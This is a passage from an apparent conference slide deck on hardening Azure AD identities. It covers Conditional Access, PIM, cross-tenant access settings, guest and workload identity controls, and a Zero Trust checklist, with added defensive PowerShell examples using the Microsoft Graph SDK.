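        clientAppTypes = @('exchangeActiveSync', 'other')
    }
    grantControls = @{ operator = 'OR'; builtInControls = @('block') }
}

# 2. Require MFA for administrators, targeted by directory role rather than by user
$adminRoleTemplateIds = @(
    '62e90394-69f5-4237-9190-012177145e10',  # Global Administrator
    'e8611ab8-c189-46e8-94e1-60213ab1f814',  # Privileged Role Administrator
    '194ae4cb-b126-40b2-bd5b-6091b380977d',  # Security Administrator
    'fe930be7-5e62-47db-91af-98c3a49a38b1'   # User Administrator
)
$mfaAdmins = @{
    displayName = 'CA002 - Require MFA for administrators'
    state       = 'enabledForReportingButNotEnforced'
    conditions  = @{
        users          = @{ includeRoles = $adminRoleTemplateIds; excludeUsers = $breakGlassIds }
        applications   = @{ includeApplications = @('All') }
        clientAppTypes = @('all')
    }
    grantControls = @{ operator = 'OR'; builtInControls = @('mfa') }
}

foreach ($policy in @($blockLegacy, $mfaAdmins)) {
    $created = New-MgIdentityConditionalAccessPolicy -BodyParameter $policy
    "Created '$($created.DisplayName)' ($($created.Id)) in state $($created.State)"
}
```

After a few days of report-only data (the "Report-only" tab of each sign-in log entry shows what the policy would have done), switch a policy on with Update-MgIdentityConditionalAccessPolicy -ConditionalAccessPolicyId <id> -State enabled. Never enable a policy that does not exclude the break-glass accounts.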
• 32. Azure AD Hardening, Part 3: Use PIM
Privileged Identity Management (Azure AD P2), best practices:
 Enable PIM for privileged accounts
 Enable PIM for all admin roles (Zero Trust)
 Require MFA on activation for each role
 Limit Global Administrator activation to 2 hours maximum (Zero Trust)
 Think about the default assignment duration (partner accounts are often left permanent)
 Configure e-mail notifications to track usage
 Configure weekly Access Reviews for PIM
 Use privileged access groups (PIM for groups)
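The first thing to measure before rolling PIM out is standing access: active role assignments that are permanent ("Assigned" with no end date) rather than just-in-time activations ("Activated"). The following is an added example, not from the deck, that reports them for a few privileged roles with the Microsoft Graph PowerShell SDK (PIM endpoints need Azure AD P2; the session needs RoleManagement.Read.Directory and Directory.Read.All). The role list is an assumption.

```powershell
# Added example: find privileged role assignments that bypass PIM (permanent standing access).
Connect-MgGraph -Scopes 'RoleManagement.Read.Directory', 'Directory.Read.All'

# Map the built-in role definitions we care about: id -> display name
$watch    = 'Global Administrator', 'Privileged Role Administrator', 'Security Administrator', 'User Administrator'
$watchIds = @{}
Get-MgRoleManagementDirectoryRoleDefinition -All |
    Where-Object { $watch -contains $_.DisplayName } |
    ForEach-Object { $watchIds[$_.Id] = $_.DisplayName }

# Active assignment instances = permanent assignments + currently activated PIM eligibilities
$instances = Get-MgRoleManagementDirectoryRoleAssignmentScheduleInstance -All |
    Where-Object { $watchIds.ContainsKey($_.RoleDefinitionId) }

$report = foreach ($i in $instances) {
    $principal = Get-MgDirectoryObject -DirectoryObjectId $i.PrincipalId
    $props     = $principal.AdditionalProperties
    $name      = if ($props['userPrincipalName']) { $props['userPrincipalName'] } else { $props['displayName'] }
    [pscustomobject]@{
        Role       = $watchIds[$i.RoleDefinitionId]
        Principal  = $name
        Type       = ($props['@odata.type'] -replace '#microsoft.graph.', '')
        Assignment = $i.AssignmentType      # Assigned = standing access, Activated = PIM activation
        Via        = $i.MemberType          # Direct or Group
        Ends       = $i.EndDateTime         # $null = permanent
    }
}

$report | Sort-Object Role, Principal | Format-Table -AutoSize

# Everything permanent except the two break-glass accounts should become an eligible assignment
$permanent = @($report | Where-Object { $_.Assignment -eq 'Assigned' -and -not $_.Ends })
"Permanent privileged assignments to convert to PIM eligibility: $($permanent.Count)"
```

The two break-glass accounts are the one accepted exception: they keep a permanent Global Administrator assignment precisely so that they work when PIM, MFA or Conditional Access is what is broken.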
• 33. Azure AD Hardening, Part 4: Use Microsoft Defender for Identity
Why use Microsoft Defender for Identity?
 Hyperscale SaaS protection in Azure
 Defender for Cloud Apps integration
 Multi-forest support
 Detection of DCShadow
 Continuous updates in SaaS mode
 Sensor and standalone sensor (successors of the ATA sensors)
 Included with EMS E5, M365 E5 and M365 E5 Security
• 34. Azure AD Hardening, Part 5: Identity Governance, use the new Lifecycle Workflows
Example of a new-hire onboarding workflow (the tasks shown on the slide):
 Trigger: employee start date
 Create the user account (status: disabled)
 Group assignments
 Generate a Temporary Access Pass (TAP)
 Send an e-mail to the hiring manager with the TAP
 Enable the user account
 Add the user to the Teams "New Hires" channel
 Send a welcome e-mail to the new hire
 Send an e-mail to the onboarding DL
 Launch a custom Logic Apps workflow
• 35. Azure AD Hardening, Part 6: Management of external identities and collaboration
• 36. Azure AD Hardening, Part 6: External identities and the new cross-tenant access settings
Cross-tenant access settings, best practices:
 Use case 1: configure B2B Collaboration
 Use case 2: configure B2B Direct Connect
 Configure inbound access in granular mode, trusting the partner's MFA and compliant-device claims
 Configure outbound access with granularity and scope it to your groups
 Block all outbound B2B collaboration by default
 Use shared channels
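The settings above, applied with the Microsoft Graph PowerShell SDK: outbound B2B collaboration blocked by default for everyone, then one partner tenant allowed outbound for a scoped group only, with that partner's MFA and compliant-device claims trusted inbound so Conditional Access can require them without re-prompting. This is an added example, not from the deck; it assumes the Microsoft.Graph module with the Policy.ReadWrite.CrossTenantAccess scope, and the partner tenant ID and group object ID are placeholders.

```powershell
# Added example: cross-tenant access settings (default + one partner).
Connect-MgGraph -Scopes 'Policy.ReadWrite.CrossTenantAccess'

$partnerTenantId = '11111111-2222-3333-4444-555555555555'   # assumed
$partnerGroupId  = '<objectId of the partner-collaboration group>'   # assumed

# 1. Default settings apply to every tenant without a partner-specific configuration:
#    block outbound B2B collaboration for all users and all applications.
$defaultOutbound = @{
    b2bCollaborationOutbound = @{
        usersAndGroups = @{ accessType = 'blocked'; targets = @(@{ target = 'AllUsers';        targetType = 'user' }) }
        applications   = @{ accessType = 'blocked'; targets = @(@{ target = 'AllApplications'; targetType = 'application' }) }
    }
}
Update-MgPolicyCrossTenantAccessPolicyDefault -BodyParameter $defaultOutbound

# 2. Partner-specific settings: allow outbound only for the scoped group, and trust
#    the partner's MFA and device-compliance claims inbound (not hybrid-joined devices).
$partner = @{
    tenantId = $partnerTenantId
    b2bCollaborationOutbound = @{
        usersAndGroups = @{ accessType = 'allowed'; targets = @(@{ target = $partnerGroupId;   targetType = 'group' }) }
        applications   = @{ accessType = 'allowed'; targets = @(@{ target = 'AllApplications'; targetType = 'application' }) }
    }
    inboundTrust = @{
        isMfaAccepted                       = $true
        isCompliantDeviceAccepted           = $true
        isHybridAzureADJoinedDeviceAccepted = $false
    }
}
New-MgPolicyCrossTenantAccessPolicyPartner -BodyParameter $partner

# 3. Read back and verify the partner configuration
Get-MgPolicyCrossTenantAccessPolicyPartner -CrossTenantAccessPolicyConfigurationPartnerTenantId $partnerTenantId |
    Select-Object TenantId, @{ n = 'InboundTrust'; e = { $_.InboundTrust | ConvertTo-Json -Compress } }
```

The default block takes effect for every user immediately, so roll it out in a pilot tenant first and inventory the partner tenants your users already collaborate with (the sign-in logs show the resource tenant) before switching it on. B2B Direct Connect has its own b2bDirectConnectInbound / b2bDirectConnectOutbound settings in the same objects and must be scoped separately.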
• 37. Azure AD Hardening, Part 7: Protect yourself against guest and external users with 9 control points
ID | Action | Impact
01 | Dedicated Conditional Access policy for MFA | Medium
02 | Dynamic group including all external / guest users | Low
03 | CA hardening: block all cloud apps except Teams / SPO | High
04 | CA: Terms of Use | Medium
05 | Restriction: prevent download, web-only access for sensitive Teams / SharePoint sites | High
06 | Session timeout (daily MFA / authentication) | High
07 | Access reviews for guest accounts | Medium
08 | Sensitivity labels for M365 groups (Teams and SharePoint Online) | High
09 | Dedicated audit log for guest / external user access | High
• 38. Azure AD Hardening, Part 8: Protect your workload identities
 68% of workload identities can access sensitive data and assets (source: SCIM Quarterly Analysis, July 7th, 2022)
 Human identities vs. machine identities: about 5 machine IDs for 1 human ID (source: Microsoft Security internal research, 2021)
• 39. Azure AD Hardening, Part 8: Protect your workload identities
Human identities vs. machine identities, future: about 20 machine IDs for 1 human ID
 1: Deploy access reviews for service principals
 2: Configure Conditional Access for workload identities
 3: Deploy Azure AD Identity Protection (workload identity risk)
 4: Set up the admin consent workflow for user consent requests
 5: Audit and log with Defender for Cloud Apps / Azure Sentinel
• 40. Azure AD Hardening, Part 9: Management of external identities and collaboration
• 41. Azure AD Hardening, Part 10: to go beyond...
User access strategy
 Dedicated admin user (cloud-only)
 PIM with the rights actually needed
  Global Administrator: 2 h
  Other roles: 4 h
 MFA / passwordless FIDO2
 Conditional Access:
  Scope: admin users
  Exclude: break-glass accounts
  Device: Windows
  Location: trusted location
  Grant: require the device to be marked as compliant
 Identity Protection
  Sign-in risk
  User risk
 Password Protection
Privileged Access Workstation
 Autopilot profile (Azure AD joined)
 Compliance with Endpoint Manager
 Security and hardening device profile
 Security baseline
 Deny BYOD
 Windows Update setup
 Defender for Endpoint, integrated with Endpoint Manager
• 42. Azure AD Hardening, Part 11: The model for tomorrow...
Enterprise Access Model
 Tier 0
  Access control plane
  Management
 Tier 1
  Management plane
  Data management
  Applications
 Tier 2
  User access
  Application access (API, ...)
• 43. Azure AD Hardening, Part 12: SecOps
A SecOps implementation is essential:
 Unified alert management
 Unified incident management
 Log management / forwarding
 Proactivity
 Automatic playbook triggering via Sentinel (remember to add the Azure AD data connectors)
 Have a real detection / hunting and response strategy
 Don't forget hunting with KQL
 Use the Microsoft 365 Defender portal
• 44. Conclusion
• 45. Zero Trust smooth deployment in 12 steps
Think hybrid and protect your on-premises Active Directory environment!
1. Use Azure AD as your IAM
2. Manage identity and access
3. Provision users
4. Control all authentications
5. Implement strong and secure authentication
6. Evaluate authentications and credentials
7. Determine trusted zones
8. Determine resource access
9. Apply least privilege
10. Secure administrative rights
11. Take advantage of Conditional Access
12. Train continuously!
Themes:
 Modernize identity and device management
 Consolidation, then legacy infrastructure clean-up
 Configure secure access for all types of users
 Secure your hybrid environment
 Strong authentication, Conditional Access and intelligent policies
 Secure experience for all users
• 46. Finally, our Zero Trust "to-do list"
Microsoft documentation!
 Zero Trust Document Center: https://docs.microsoft.com/en-us/security/zero-trust/
 Monitor your Azure AD Secure Score: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity-secure-score
 Integrate your apps into Azure AD: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an-application-integration
 Security Update Guide, patch and patch again!: https://msrc.microsoft.com/update-guide/
Identity and authentication
 Enable PHS and do not use PTA or AD FS federation
 Enable Seamless SSO and minimize the use of on-premises AD FS
 Azure MFA + passwordless with FIDO2 (Yubico, ...)
 Use PIM for IT teams
 Use Azure AD Identity Protection for everyone
 Privileged accounts | backup (break-glass) accounts | MFA | passwordless
Conditional Access
 MFA for guests
 MFA for everyone
 Access policies and trusted locations
 Test | What If?
Reports - SecOps
 Devices
 Azure AD logs (sign-ins and applications)
 Users at risk: logins, locations, IP, GPS, Cloud App Security
 Azure Sentinel
Passwords
 SSPR
 Smart Lockout
 Azure AD / Active Directory Password Protection
Education & communication with users
 Internal training / cyber best practices
• 47. Thanks to all our partners! @IdentityDays #identitydays2022 Thank you all ✨👍